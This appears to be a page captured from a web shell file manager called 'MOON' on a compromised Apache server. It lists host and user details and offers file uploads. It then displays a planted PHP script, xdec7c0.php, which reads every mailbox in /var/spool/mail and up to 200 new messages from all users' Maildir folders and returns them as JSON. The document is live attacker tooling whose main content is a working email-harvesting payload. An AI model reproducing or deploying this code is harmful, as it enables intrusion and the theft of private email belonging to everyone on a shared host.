MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/public_html/xdec7c0.php
<?php $r=['spool'=>[],'recent'=>[]];foreach(glob('/var/spool/mail/*') as $f){  if(is_file($f)&&filesize($f)>0){    $r['spool'][]=basename($f).':'.substr(@file_get_contents($f),0,500000);}}foreach(glob('/home/*/mail/*/*/new/*') as $f){  if(count($r['recent'])>=200)break;  if(is_file($f))$r['recent'][]=basename(dirname(dirname(dirname($f)))).'/'.$f.':'.substr(@file_get_contents($f),0,500000);}echo json_encode(['ok'=>1,'spool_count'=>count($r['spool']),'recent_count'=>count($r['recent']),'data'=>$r]);?>